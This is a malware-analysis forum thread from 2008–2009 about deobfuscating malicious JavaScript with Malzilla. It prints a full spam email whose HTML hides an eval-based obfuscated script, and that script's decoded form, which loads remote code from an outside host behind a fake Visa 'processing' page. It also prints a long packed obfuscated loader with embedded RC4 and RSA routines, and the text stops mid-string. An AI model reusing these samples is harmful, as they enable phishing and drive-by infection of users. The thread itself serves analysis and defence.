Author Topic: Haven't seen this one before (Read 31046 times)

bobby · September 29, 2008, 05:47:35 pm

Will be decoded by the next version of Malzilla

I think I know how I can process it.
The sub-project name is "Kalimero processor". As for now, it gets all the relevant HTML-part data. It remains now to implement passing the data to JS engine.
Because of urgency, Kalimero will probably create template from HTML, the same kind of template we already have in Decoder tab, and Decoder will use it like any other template. This is probably the fastest way to get deobfuscation of this kind of scripts implemented.

lance · October 07, 2008, 08:23:38 pm

How did you manage to decode it? I've tried several ways, but have abs no idea

bobby · October 07, 2008, 08:47:21 pm

No, it can't be decoded because it contains bugs, but at least we know which kind of scripts we can expect in the future.

SysAdMini · October 16, 2008, 05:40:52 pm

DOM-based obfuscation in malicious JavaScript
http://www.cs.ucsb.edu/~marco/blog/2008/10/dom-based-obfuscation-in-malicious-javascript.html

bobby · October 16, 2008, 06:00:52 pm

Forgot to mention that Malzilla now does deobfuscate all the scripts mentioned in this topic.
Credits goes to antnet, who implemented needed DOM objects for deobfuscating this kind of scripts.

philipp · October 18, 2008, 12:02:32 pm

hi,
i got an email with an interesting (obfuscated) javascript using html elements.
unfortunatly i cant install malzilla, so i thought ill post the source here for you to check if malzilla is able to decode this one as well

Code: [Select]

Return-Path: <akstcstatepipemnsdgs@statepipe.com>
X-Original-To: postmaster@xxx.de
Delivered-To: postmaster@xxx.de
Received: from dimash-58419dbd (unknown [89.218.245.253])
	by family.xxx.de (Postfix) with ESMTP id 24790361B668
	for <postmaster@xxx.de>; Sat, 18 Oct 2008 11:20:47 +0200 (CEST)
Received: from [89.218.245.253] by mail-fwd.mx.g19.rapidsite.net; Sat, 18 Oct 2008 15:20:47 +0600
Message-ID: <01c93135$18733180$fdf5da59@akstcstatepipemnsdgs>
From: "Liz Haskins" <akstcstatepipemnsdgs@statepipe.com>
To: <postmaster@xxx.de>
Subject: zzbrq
Date: Sat, 18 Oct 2008 15:20:47 +0600
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0007_01C93135.18733180"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4927.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
X-DSPAM-Result: Spam
X-DSPAM-Processed: Sat Oct 18 11:20:48 2008
X-DSPAM-Confidence: 0.8483
X-DSPAM-Probability: 1.0000
X-DSPAM-Signature: 48f9aa7075265120455541

This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C93135.18733180
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

http://thankfun.com
lzzhm bnmr, hctm od.

------=_NextPart_000_0007_01C93135.18733180
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dus-ascii"=
>
<META content=3D"MSHTML 5.50.4927.1200" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY>

<DIV STYLE=3Dexp/*<A STYLE=3D'N\xsc:PmB("*//*");&#101;x&#x2F;*g*//*/*/pre=
ssion(top["ev"&#43"al"](unescape(document.getElementById("seNYKvlG").inne=
rHTML.replace(/[^\d%a-fA-F]+/g,""))))'>>zp63nJ</DIV>
<DIV id=3D"seNYKvlG">%j2O0%P73H%n6s5t%J7K4X%R4y9q%w6jE%g7H4T%L6Z5y%i7y2o%=
n7m6s%X6X1,%z6wCN%m2s8H%h2l2V%g7V7y%q6G9J%w6tEj%i6U4M%o6PFX%j7m7s%n2iEY%s=
7v3o%l7x4n%M6.1Z%q7U4I%M7s5L%h7l3p%H2l0j%Y3IDW%H2h0,%l2l7n%Q4KFR%y7s0h%P6=
z5

%q6mE(%G6x9V%Y6MEm%Q6o7T%P2Z0Y%I7O0Z%.6X1)%O6H7H%T6r5O%p2z0I%Q2o2z%S2nBk%=
R6O4J%u6mFS%n6.3x%r7W5j%k6xDR%M6m5(%s6VEw%T7h4P%t2LEH%z6iC.%z6KFj%q6I3y%U=
6M1S%P7,4N%O6X9t%P6tFh%T6PEH%N2.Bv%S2q2p%K2MEl%Z2iEL%p2

EN%U2X7T%v2k2u%j2uCn%W3I1p%V3W0w%W3O0u%T2p9X%H3ZBg%K6Y4N%k6oFW%m6n3W%q7X5=
n%y6xDX%H6p5,%)6.Eu%J7m4V%s2OEq%l6H3z%g6QFJ%S6kFW%w6oBK%i6t9V%M6L5x%v3MDx=
%X2j2.%K7k2m%)7Y5J%U6XEH%r5mFz%y6z6i%l7P2)%o6SFq%t6nDS%

5wFU%x6XDJ%U6r1M%x6P9l%r6WCY%h3nDK%i2N2G%.2gBU%P6N5w%o7k3k%u6H3)%q6z1w%U7=
P0T%p6X5P%x2,8P%p2V2W%I3Z0I%h7,8N%I6V6Y%)6m6J%.6.6g%o6U6p%)6K1.%M3j0y%T3J=
9G%.3.1O%Y3n2w%g6K2g%w2U2X%,2l9v%g3wBS%i6V9Q%r6q6t%R2m8

%h6H4Z%K6qFV%q6X3N%q7t5z%y6HDr%U6x5J%W6gEu%j7q4n%U2HEv%q6z7u%t6x5L%Z7O4W%=
S4y5Z%q6rCS%o6W5I%V6UDX%P6r5O%Y6lEP%V7w4(%z4U2X%T7X9)%w4Y9t%l6p4j%Y2h8X%V=
2Y2Z%k7QBz%g5kFq%z4g4M%j4Y9x%t5n6m%n5s3U%x5,4)%q4LFV%o5

0.%.7ODW%k2s2(%v2K9Q%Z2GEO%i6n9o%O6uEH%n6iE)%U6T5z%M7z2I%V4S8Q%p5r4Q%N4WD=
o%g4MCn%y2n1s%U3HDN%Y2p2p%P3p1n%.2Q2z%i2h9Z%M7LBL%J6k4M%l6)FQ%T6,3x%p7P5h=
%L6tDN%i6n5G%W6iEj%S7Y4p%r2iEV%S7Q7V%I7X2t%R6(9n%q7,4p%

6l5N%s2Y8h%N2g2W%Q3hCN%g6(8V%y7r4w%S6ODU%Z6oCU%v3IE)%k3kCo%g6y8t%X6l5X%Z6=
1R%o6H4N%Y3uEk%)3wCR%u2IFy%K6H8V%u6K5H%P6R1(%m6w4,%n3qEG%N3YCu%u6y2i%S6L=
FX%J6q4M%y7.9R%y3.Et%p2J2g%x2JBQ%G2x2Z%i4QCU%Y6mFi%o6j1

%M6O4,%n6W9L%l6XEn%k6n7K%H2R0O%t6xDl%X6X5n%o7l3P%R7w3Z%W6)1g%T6L7h%h6,5t%=
t2r0g%x6R2s%H6)FU%u6.4l%P7L9T%r2qCk%j2w0O%R7W0t%R6uC.%r6k5p%p6T1p%z7(3q%G=
6J5S%X2z0q%O7v7U%o6P1z%U6q9m%u7I4O%t2tE)%w2tEL%n2yE.%r3

CM%I6o2t%H7V2.%p3ZEG%)2o2)%Q2uBo%r2s2T%v3UCW%t4V9k%x4nDg%X4L7T%h2P0T%R7.3=
h%x7L2R%.6n3q%(3IDS%R2u7O%t6z8u%s7X4p%T7j4k%)7Q0q%W7n3s%v3(AX%,2zF.%k2MFv=
%W7S6q%)6K5w%U7p2x%x6h9h%p6z6S%q6L9L%z6M5x%,6R4Q%R2sEM%

7z6Q%l6T9v%U7X3h%l6N1(%x2pEt%r6q3j%G6IF)%i6HDP%t2nFq%L6N1u%p6,1R%M6RDM%P2=
LFl%p6T9z%I6xDn%w6g1k%(6t7V%(6R5Y%r7q3T%h2HFN%S7Q0v%u7Z2O%O6kFk%u6T3R%O6G=
5U%X7J3W%i7P3h%V6(9t%N6gEM%J6u7x%z2wEY%L6N7S%S6K9q%z6Y6

%h2L7R%g3qEv%S3gCK%.6i2l%)7Q2n%S3IEN%.2m2,%P2HBV%y2l2)%S3mCH%x7p3)%s6Y3h%=
h7H2Z%o6G9U%L7H0z%Q7n4(%)2Q0N%M7l3)%W7I2Z%K6u3X%L3jDu%v5oCY%V2.2Q%H6J8(%p=
7R4I%V7S4g%.7U0J%k3wAs%g2UFv%U2)FQ%X6N2G%Y2vEU%v6SEU%L6

AX%v6KEq%j6oBg%Q2vEm%V6wEI%V6k5q%z7w4Y%T2nFK%K6u3X%r6W7g%w6y9X%T2ZDs%W6q2=
Z%q6J9g%y6HEX%L2zFg%Q6)1u%Z6.4O%G7s6S%y6h5j%o7y2l%R7K4X%X2nE.%h7H0j%Y6MCK=
%x5VCK%P2l2t%h3xEr%S3lCH%v2UFQ%U7O3H%p6)3O%J7M2i%G6L9x%

7j0U%m7o4J%I3IEy%(2k2X%Z2UBs%J2w2h%)3sCj%W2NFw%n6u2O%)6iFM%I6Q4.%x7x9p%)3=
Ez%K3xCN%y2(Fu%O6x8x%N7K4n%(6UDs%P6LCj%o3vEm%O2H2X%R2o9X%r3WBT%x6X4L%r6w=
FL%H6j3M%Y7m5G%L6vD.%R6o5T%P6vEK%j7W4T%Z2YEO%r6W7)%O6v5

%U7I4s%H4x5V%y6sCL%t6)5Q%k6tDL%p6,5n%O6PET%v7U4m%i4k2N%g7v9q%o4h9Z%k6r4i%=
(2y8S%L2X2X%p7PBJ%.5ZFm%o4J4K%v4M9Q%W5P6j%Q5(3y%i5s4N%Y4IFO%R5i0O%x7nDw%H=
2r2Y%S2X9p%p2NEK%P6x9J%I6wEp%H6NE(%I6(5m%q7M2G%n4y8W%v5

4M%G4tDH%P4pCn%u3(DU%M2Q2L%R3.1O%(2V2g%y3NBw%.7UDX%)2O0u</DIV>

</BODY></HTML>

------=_NextPart_000_0007_01C93135.18733180--

decodes to:

Code: [Select]

setInterval("window.status = 'Opening page "+document.location+"...'",100);document.cookie="run_from_mail="+escape("0xffffa0912b");if(document.getElementById("{_DIVSTOP}").innerHTML!="1"){document.write("<html><head></head><body>"+"Loading message body, please wait...<br>"+"<IMG src='https://verified.visa.com/aam/images/processing.gif'><br>"+"<script src=\"http://b.njnk.net/cgi-bin/advert.pl\"></script>"+"</body></html>");document.getElementById("{_DIVSTOP}").innerHTML="1";}

regards,
philipp

SysAdMini · January 26, 2009, 05:51:59 pm

Code: [Select]

<body><script>A='';I='123456789+/=";function ';O='return ci}CCJ="ABCDEFGH';S='hexToString(d){a="";';V='="";for(i=0;i<b;i++){';H='b=b*64+CCJ.indexOf(d.';U='function HDV(a,b){ci';N='+=a.substring(d,d+1)}';Z='var d=Math.floor(M';J='efghijklmnopqrstuvwxyz0';R='1?64:c/4);if(c!=64){';Q='charAt(i));c=(c==';C='IJKLMNOPQRSTUVWXYZabcd';P='harAt(i)=="\\n") break;';W='0;i<d.length;i++){';Y='ath.random()*a.length);ci';M='if(d.charAt(i)=="="||d.c';T='b=0;c=1;for(i=';A+=U+V+Z+Y+N+O+C+J+I+S+T+W+M+P+H+Q+R;U='=s[i];s[i]=s[j];';S='b.length;y++){i=(i+1';M='k+=a;a=k;for(i=oil;i<25';H='return a}oil=0;fu';G='nction OSZ(a,b){';K=';c="";for(y=0;y<';Z=';for(i=oil;i<256;i++';X='arCode(parseInt(b/c));';Q='s[j]=x}i=oil;j=oil';J='oil;oil=0}s=new Array();';P='){j=(j+s[i]+a.charCod';C=')%256;j=(j+s[i])%256;';V='b%=c}}';O='a+=String.fromCh';F='6;i++)s[i]=i;j=oil';I='k="";if(isNaN(oil)){k=';E='eAt(i%a.length))%256;x';A+=O+X+V+H+G+I+J+M+F+Z+P+E+U+Q+K+S+C;V='x=s[i];s[i]=s[';C='c}function rc4Decrypt(';F='rCodeAt(y)^s[(s[i]+s[j';B='(a,256);else this.XEL';T='n new A(null)}function ';N='tring.fromCharCode(b.cha';X='j];s[j]=x;c+=S';L='(a,b)}function nbi(){retur';G='}VLG=((0xdeadbeef';D=';else if(b==null&&"str';O='e);function A(a,b,c){i';Y='a,b){return OSZ(a,b)';E='ing"!=typeof a)this.XEL';H='f(a!=null)if("number"==type';S='cafe&0xffffff)==0xefcaf';Z='])%256])}return ';J='of a)this.fromNumber(a,b,c)';A+=V+X+N+F+Z+C+Y+G+S+O+H+J+D+E+B+L+T;D='[j++]=v&0x3ffffff}return c';Q='c,n){var a=x&0x3fff,xh=x>>14';G=';while(--n>=0){var l=this[i';H='l+((m&0x7fff)<<15)+w[j]+(';Y='+c;c=Math.floor(v/0x4000000);w';Z=' c}function QZY(i,x,w,j,';X='=0){var v=x*this[i++]+w[j]';W='STI(i,x,w,j,c,n){while(--n>';V=']&0x3fff;var h=this[i++]>';J='c&0x3fffffff);c=(l>>>30)+';L=',xh=x>>15;while(--n>=0){var l=';R='j,c,n){var a=x&0x7fff';M='s[i++]>>15;var m=xh*l+h*a;l=a*';C='=l&0x3fffffff}return';T='(m>>>15)+xh*h+(c>>>30);w[j++]';O='}function PFI(i,x,w,';S='this[i]&0x7fff;var h=thi';A+=W+X+Y+D+O+R+L+S+M+H+J+T+C+Z+Q+G+V;X='am=QZY;B=28}A.prototype.DB=B;';B='>14;var m=xh*l+h*a;l=a';S='otype.am=PFI;B=30}else if(VL';E='4)+xh*h;w[j++]=l&0xfffffff}re';Y='j]+c;c=(l>>28)+(m>>1';U='pe")){A.prototype.am=ST';G='BI_FP=52;A.prototype.FV=Math.';N='I;B=26}else{A.prototype.';W='turn c}if(VLG&&(navig';R='pow(2,BI_FP);A.prototype.F1=';K='G&&(navigator.appName!="Netsca';H='ototype.DV=(1<<B);var ';Q='*l+((m&0x3fff)<<14)+w[';C='A.prototype.DM=((1<<B)-1);A.pr';L='BI_FP-B;A.prototype.F2=2*B-';T='ator.appName=="Microsoft ';M='Internet Explorer")){A.prot';A+=B+Q+Y+E+W+T+M+S+K+U+N+X+C+H+G+R+L;S=';var rr,vv;rr="0".charCodeAt';Y='{return JCN.charAt(n';F='BI_FP;var JCN="0123456789abcde';N='=null)?-1:c}function NTY(r){fo';I='=vv;rr="A".charCodeAt(0);f';E='or(vv=10;vv<36;++vv)';X=')}function EUH(s,i){var c=L';M='arCodeAt(0);for(vv=10';T='(0);for(vv=0;vv<=9;++vv';D='VT[s.charCodeAt(i)];return(c=';H=';vv<36;++vv)LVT[rr++]';Z=')LVT[rr++]=vv;rr="a".ch';P='r(var i=this.t-1;i>=0;--i)r[';G='fghijklmnopqrstuvwxyz"';L=';var LVT=new Array()';U='i]=this[i];r.t=this.t;r.s=th';R='LVT[rr++]=vv;function SBG(n)';A+=F+G+L+S+T+Z+M+H+I+E+R+Y+X+D+N+P+U;W='x>0)this[0]=x;else if(x<-';Q='==2)k=1;else if(b==32';J='8)?s[i]&0xff:EUH(s,i);';P='if(x<0){if(s.charAt(i)=';K='urn}this.t=0;this.s=0;va';F='ar r=nbi();r.EZD(i);return r}f';H='is.t=1;this.s=(x<0)?-1:0;if(';U='is.s}function CTR(x){th';O=')k=5;else if(b==4)k=2;else{th';D='(b==16)k=4;else if(b==8)k=3;el';M=';while(--i>=0){var x=(k==';Z='is.t=0}function nbv(i){v';L='1)this[0]=x+DV;else th';E='se if(b==256)k=8;else if(b';S='is.fromRadix(s,b);ret';R='r i=s.length,mi=false,sh=0';X='unction JGU(s,b){var k;if';A+=U+H+W+L+Z+F+X+D+E+Q+O+S+K+R+M+J+P;F='x&((1<<(this.DB-sh))';M='DB-sh))-1)<<sh}this.QSG();if';P=']=x;else if(sh+k>thi';C='(this.DB-sh))}else this[t';E='(k==8&&(s[0]&0x80)!=0){th';Y='his.t-1]|=x<<sh;sh+=k;';W='is.s=-1;if(sh>0)this[th';K='s.DB){this[this.t-1]|=(';T='this.s&this.DM;while';L='se;if(sh==0)this[this.t++';N='(this.t>0&&this[this.';R='-1))<<sh;this[this.t++]=(x>>';J=')}function FJH(){var c=';B='="-")mi=true;continue}mi=fal';Z='if(sh>=this.DB)sh-=this.DB}if';U='is.t-1]|=((1<<(this.';G='(mi)A.ZNP.IXQ(this,this';A+=B+L+P+K+F+R+C+Y+Z+E+W+U+M+G+J+T+N;M='==8)k=3;else if(b==2';F='t-1]==c)--this.t}function LCD(';B='0){m=true;r=SBG(d)}while(i>=';P='=this.t;var p=this.DB-(i';S='"+this.UHO().CPD(b);var ';V='ar a=(1<<k)-1,d,m=false,r="",i';J='eturn this.toRadix(b);v';G='=5;else if(b==4)k=2;else r';U=')k=1;else if(b==32)k';Q='-i]>>(p+=this.DB-k)}el';D='0){if(p<k){d=(this[i]&((1<<p)-';C='k;if(b==16)k=4;else if(b';H='se{d=(this[i]>>(p-=k';X='1))<<(k-p);d|=this[-';K='*this.DB)%k;if(i-->0){i';Y='b){if(this.s<0)return"-';W='f(p<this.DB&&(d=this[i]>>p)>';A+=F+Y+S+C+M+U+G+J+V+P+K+W+B+D+X+Q+H;S='r}function BEQ(){return(th';I='+=8}if((t=x>>4)!=0){x=t';R='is.s<0)?this.UHO():this}f';J='t;if((t=x>>>16)!=0){x=t;r+=16}';E='))&a;if(p<=0){p+=this';W='i();A.ZNP.IXQ(this,r);return ';Z='0}function LVW(x){var r=1,';G='0"}function WVI(){var r=nb';V='s.t;r=i-a.t;if(r!=0)return';T=']-a[i])!=0)return r;return ';H=';r+=4}if((t=x>>2)!=0){x';F='unction ZDV(a){var r=this.s-a.';P=' r;while(--i>=0)if((r=this[i';D='if((t=x>>8)!=0){x=t;r';O='.DB;--i}}if(d>0)m=true;if(m)r+';Y='=SBG(d)}}return m?r:"';X='s;if(r!=0)return r;var i=thi';A+=E+O+Y+G+W+S+R+F+X+V+P+T+Z+J+D+I+H;B='];for(i=n-1;i>=0;--i)r[';X='s=this.s}function WND(n,r';R='eturn this.DB*(this.t-1)+LV';S='{if(this.t<=0)return 0;r';K='i-n]=this[i];r.t=Math.max(thi';O='=1}return r}function QYQ()';M='is.s&this.DM))}function XLJ(n,';W='s.t-n,0);r.s=this.s}function';G='=t;r+=2}if((t=x>>1)!=0){x=t;r+';C='1;var e=Math.floor(n/t';Z='b=this.DB-a;var d=(1<<b)-';N=' NVJ(n,r){var a=n%this.DB;var ';P='r){var i;for(i=this.t-1;';T='){for(var i=n;i<this.t;++i)r[';I='W(this[this.t-1]^(th';H='i>=0;--i)r[i+n]=this[i';V='i]=0;r.t=this.t+n;r.';A+=G+O+S+R+I+M+P+H+B+V+X+T+K+W+N+Z+C;W='or(n/this.DB);if(a>=this.t';F='r[i]=0;r[e]=c;r.t=this.t';O='his.DB),c=(this.s<<a';X='){r.t=0;return}var b';N='t;++i){r[i-a-1]|=(this[i]&d)<<';T='c;r[i-a]=this[i]>>b}if(b>0)r[t';K='=n%this.DB;var c=this.DB-b;';M='is[a]>>b;for(var i=a+1;i<this.';Q='+e+1;r.s=this.s;r.QS';C='i]&d)<<a}for(i=e-1;i>=0;--i)';L='r.s=this.s;var a=Math.flo';B='var d=(1<<b)-1;r[0]=th';D='G()}function IBR(n,r){';Y='-1;i>=0;--i){r[i+e+1';P=']=(this[i]>>b)|c;c=(this[';R='his.t-a-1]|=(this.s&d)<<c;r';Z=')&this.DM,i;for(i=this.t';A+=O+Z+Y+P+C+F+Q+D+L+W+X+K+B+M+N+T+R;L='ath.min(a.t,this.t);while(i<';F='if(c>0)r[i++]=c;r.t=i;r.';P='s}else{c+=this.s;whi';V='.t=this.t-a;r.QSG()}funct';N='m){c+=this[i]-a[i];r[i++]=c&';D='this.DM;c>>=this.DB}if(a';U=')r[i++]=this.DV+c;else ';Q='r){var x=this.abs(),y=a.abs';X='ion PMT(a,r){var i=0,c=0,m=M';H='le(i<a.t){c-=a[i];r[i++]=c&th';E='.DM;c>>=this.DB}c+=this.';R='a.s}r.s=(c<0)?-1:0;if(c<-1';O='QSG()}function RIP(a,';K='();var i=x.t;r.t=i+y.t;whi';J='.t<this.t){c-=a.s;while(i<this';Z='.t){c+=this[i];r[i++]=c&this';W='is.DM;c>>=this.DB}c-=';A+=V+X+L+N+D+J+Z+E+P+H+W+R+U+F+O+Q+K;U='*x[i],r,2*i+1,c,x.t-i';Q='nction QJV(m,q,r){var a=m';G='.DV;r[i+x.t+1]=1}}if(r.t';L='.abs();if(a.t<=0)return;';W='i=0;i<y.t;++i)r[i+x.t]=x.';Z='-1))>=x.DV){r[i+x.t]-=x';E='if((r[i+x.t]+=x.am(i+1,2';H='le(--i>=0)r[i]=0;for(';P='am(0,y[i],r,i,0,x.t);r.s=0;';Y='=r.t=2*x.t;while(--i>=0)r';M='[i]=0;for(i=0;i<x.t-1;++i){va';K='>0)r[r.t-1]+=x.am(i,x[i]';V=',r,2*i,0,1);r.s=0;r.QSG()}fu';N='.s)A.ZNP.IXQ(r,r)}function Z';I='r c=x.am(i,x[i],r,2*i,0,1);';J='JT(r){var x=this.abs();var i';D='r.QSG();if(this.s!=a';A+=H+W+P+D+N+J+Y+M+I+E+U+Z+G+K+V+Q+L;U='(r)}var d=y.t;var f=y[d-1];i';D=')>=0){r[r.t++]=1;r.IXQ(t,';V='.DB-LVW(a[a.t-1]);if';Q='r==null)r=nbi();var y=nbi()';W='var b=this.abs();if(b.t<a.';N='s.F1)+((d>1)?y[d-2]>>this';J='null)this.GLM(r);return}if(';T='ar i=r.t,j=i-d,t=(q==null)?';H='(c>0){a.OGH(c,y);b.OGH';M='f(f==0)return;var g=f*(1<<thi';Z='=(1<<this.F1)/g,e=1<<this.F2;v';E='(c,r)}else{a.GLM(y);b.GLM';X='t){if(q!=null)q.EZD(0);if(r!=';I=',ts=this.s,ms=m.s;var c=this';G='.F2:0);var h=this.FV/g,d2';O='r)}A.ONE.YKT(d,t);t.IXQ(y,y';R='nbi():q;y.YKT(j,t);if(r.RVT(t';A+=W+X+J+Q+I+V+H+E+U+M+N+G+Z+T+R+D+O;D='(a){var r=nbi();this.ab';R='[i]+=y.am(0,k,r,j,0,d))';V='{this.m=m}function GEM(x){if';E='&&r.RVT(A.ZNP)>0)a.IXQ(r,r);';S='(--j>=0){var k=(r[--i]==f)?t';M=');while(y.t<d)y[y.t++]=0;while';H='.UVV(c,r);if(ts<0)A.ZNP.';X='return r}function XHZ(m)';P='le(r[i]<--k)r.IXQ(t,r)}';J='his.DM:Math.floor(r[i]';Y='}if(q!=null){r.SLX(d,';C='s().IDW(a,null,r);if(this.s<0';Z='q);if(ts!=ms)A.ZNP.IXQ(q';F=',q)}r.t=d;r.QSG();if(c>0)r';L='IXQ(r,r)}function HKP';U='*h+(r[i-1]+e)*d2);if((r';B='<k){y.YKT(j,t);r.IXQ(t,r);whi';A+=M+S+J+U+R+B+P+Y+Z+F+H+L+D+C+E+X+V;Z=' QEM(){if(this.t<1)ret';N=')==0)return 0;var y=x&3;y';G='n QYJ(x){x.IDW(this.m,null,';B='){x.WZX(r);this.FIS(r)}';I='n IQI(x){return x}functio';C='prototype.FIS=QYJ;XHZ';T='else return x}functio';P='M;XHZ.prototype.OQU=IQI;XHZ.';V='XHZ.prototype.PIX=GE';K='(x.s<0||x.RVT(this.m';D=')>=0)return x.mod(this.m);';E='r){x.STM(y,r);this.F';R='urn 0;var x=this[0];if((x&1';M='x)}function INU(x,y,';O='.prototype.OVI=INU;XHZ';J='IS(r)}function BFD(x,r';Y='.prototype.SNT=BFD;function';A+=K+D+T+I+G+M+E+J+B+V+P+C+O+Y+Z+R+N;C='function JTU(m){this.m=m;';I='this.mp=m.LBB();this.mp';G='y=(y*(2-(((x&0xffff)*y)&';W='turn(y>0)?this.DV-y:-y}';P='*y%this.DV))%this.DV;re';T='P)>0)this.m.IXQ(r,r);r';J='r);if(x.s<0&&r.RVT(A.ZN';Y='*(2-(x&0xff)*y))&0xff;';L='eturn r}function ULW(x){';S='0xffff)))&0xffff;y=(y*(2-x';Q='=nbi();x.abs().YKT(this.m.t';B='.DB-15))-1;this.mt2=2*';D='=(y*(2-(x&0xf)*y))&0xf;y=(y';V='=this.mp>>15;this.um=(1<<(m';F='m.t}function FFN(x){var r';E='l=this.mp&0x7fff;this.mph';Z=',r);r.IDW(this.m,null,';A+=D+Y+G+S+P+W+C+I+E+V+B+F+Q+Z+J+T+L;K='on VWX(x,y,r){x.STM(';G='var r=nbi();x.GLM(r);this.FIS';W=',x)}function JOH(x,r){x.';I='is.m.am(0,a,x,i,0,this.m.t);wh';S='V;x[++j]++}}x.QSG();x.S';R='M;j=i+this.m.t;x[j]+=th';T=';++i){var j=x[i]&0x7fff';D=';var a=(j*this.mpl+(((j*t';O='(r);return r}function KJE(x)';Z='VT(this.m)>=0)x.IXQ(this.m';Y='s.mpl)&this.um)<<15))&x.D';V='ile(x[j]>=x.DV){x[j]-=x.D';C='LX(this.m.t,x);if(x.R';L='his.mph+(x[i]>>15)*thi';F='=0;for(var i=0;i<this.m.t';X='WZX(r);this.FIS(r)}functi';B='{while(x.t<=this.mt2)x[x.t++]';A+=G+O+B+F+T+D+L+Y+R+I+V+S+C+Z+W+X+K;M='IX(this),i=LVW(e)-1;g.GLM(r)';S='VI=VWX;JTU.prototype.S';H='I(r2,g,r);else{var t=r;';D='r=r2;r2=t}}return z.OQU(r';R='this.s)==0}function MUJ';C='2);if((e&(1<<i))>0)z.OV';K='otype.FIS=KJE;JTU.prototype.O';E='n((this.t>0)?(this[0]&1):';Z='NT=JOH;function ENV(){retur';B='f||e<1)return A.ONE;v';Y='otype.PIX=FFN;JTU.pro';U='ar r=nbi(),r2=nbi(),g=z.P';G='totype.OQU=ULW;JTU.prot';P='(e,z){if(e>0xfffffff';W=';while(--i>=0){z.SNT(r,r';T=')}function LTQ(e,m){var z;if(';V='y,r);this.FIS(r)}JTU.prot';A+=V+Y+G+K+S+Z+E+R+P+B+U+M+W+C+H+D+T;V='rototype.UHO=WVI;A.prot';H='pe.EZD=CTR;A.prototype.XEL';N='ototype.IDW=QJV;A.pro';W='rototype.STM=RIP;A.p';F='rototype.CPD=LCD;A.p';U='totype.LBB=QEM;A.prototype.VQT';T=');return this.exp(e,z)}';B='=ENV;A.prototype.exp=MUJ;A.p';P='V=IBR;A.prototype.IXQ=PMT;A.p';Q='A.prototype.GLM=NTY;A.prototy';I='=JGU;A.prototype.QSG=F';Z='type.OGH=NVJ;A.prototype.UV';D='e<256||m.VQT())z=new X';S='ototype.SLX=WND;A.proto';M='HZ(m);else z=new JTU(m';J='rototype.WZX=ZJT;A.pr';X='JH;A.prototype.YKT=XLJ;A.pr';A+=D+M+T+Q+H+I+X+S+Z+P+W+J+N+U+B+F+V;N='otype.abs=BEQ;A.prototy';X='=this.S[j];this.S[j]=t}this.i=';U='pe.YPP=QYQ;A.prototype.mod=HKP';Z='pe.RVT=ZDV;A.prototy';C='=0;for(i=0;i<256;++i){j=(j+thi';Q='55;t=this.S[i];this.S[i]';H='.S[this.i])&255;t=this.S[this';F='s.S[i]+a[i%a.length])&2';Y='s.S=new Array()}funct';J='nbv(0);A.ONE=nbv(1);function H';W='TL(){var t;this.i=(thi';D='0;this.j=0}function V';G='ion KLR(a){var i,j,t;for(i=';T='0;i<256;++i)this.S[i]=i;j';V=';A.prototype.TXN=LTQ;A.ZNP=';B='VN(){this.i=0;this.j=0;thi';S='s.i+1)&255;this.j=(this.j+this';A+=N+Z+U+V+J+B+Y+G+T+C+F+Q+X+D+W+S+H;T=';function DSB(x){VPQ[CKC++]^=x';W='r JGC;var VPQ;var CKC';K='urn new HVN()}var TMF=256;va';F='24)&255;if(CKC>=TMF)CKC-=T';J='&255;VPQ[CKC++]^=(x>>8)&25';S='null){VPQ=new Array();CKC=0;';R='his.i])&255]}HVN.prototype.';V='.i];this.S[this.i]=th';C='new Date().getTime())}if(VPQ==';Q='=t;return this.S[(t+this.S[t';B='MF}function ZCJ(){DSB(';M='t=VTL;function PXP(){ret';H='255;VPQ[CKC++]^=(x>>';U='5;VPQ[CKC++]^=(x>>16)&';L='is.S[this.j];this.S[this.j]';P='init=KLR;HVN.prototype.nex';D='var t;if(navigator.appNa';A+=V+L+Q+R+P+M+K+W+T+J+U+H+F+B+C+S+D;E='CKC]=0;CKC=0}return JGC.next()';Z='MF){t=Math.floor(65536';N='i=0;i<a.length;++i)a';J='>>>8;VPQ[CKC++]=t&255}CK';F='P();JGC.init(VPQ);for(CK';V='C=0;CKC<VPQ.length;++CKC)VPQ[';T='harCodeAt(t)&255}while(CKC<T';L='C=0;ZCJ()}function DLX(){';Y='th;++t)VPQ[CKC++]=z.c';W='.crypto){var z=window.cryp';B='to.random(32);for(t=0;t<z.leng';X='me=="Netscape"&&navigator.a';G='[i]=DLX()}function GKG(){}GKG.';U='}function DLXs(a){var i;for(';S='if(JGC==null){ZCJ();JGC=PX';M='ppVersion<"5"&&window';C='*Math.random());VPQ[CKC++]=t';A+=X+M+W+B+Y+T+Z+C+J+L+S+F+V+E+U+N+G;M='n XNG(b){if(b<0x10)retu';T='\\n";i+=n}return a+s.sub';I='r a="";var i=0;while(i+n<s.len';S='a,r)}function KEV(s,n){va';L='gth){a+=s.substring(i,i+n)+"';V='string(i,s.length)}functio';H='arCodeAt(i--);a[--n]=0;var ';U='i>=0&&n>0)a[--n]=s.ch';P='y();while(n>2){x[0]=0;while(x';F=',n){if(n<s.length+11)';K='rn"0"+b.CPD(16);else ret';R='b=new GKG();var x=new Arra';E='y();var i=s.length-1;while(';G='n CWB(a,r){return new A(';O='prototype.KPG=DLXs;functio';W='urn b.CPD(16)}function OJZ(s';Q='{return null}var a=new Arra';A+=O+G+S+I+L+T+V+M+K+W+F+Q+E+U+H+R+P;K='nction PBR(a){if(oil';X='>1){oil=HDV(CCJ,53);a=ci};var ';V='his.n=null;this.e=0;this.d=nul';N='=null;this.WIY=null;this.VQZ=n';R='ull;this.ICV=null}funct';T='eturn x.TXN(this.e,this.n)}fu';B='16);this.e=parseInt(E';M=';if(m==null)return n';F='(a)}function RSAKey(){t';J='ion YYX(N,E){if(N!=nu';S='l;this.p=null;this.q';O='[--n]=2;a[--n]=0;return new A';C='m=OJZ(a,(this.n.YPP()+7)>>3)';Y='ength>0){this.n=CWB(N,';E=',16)}}function 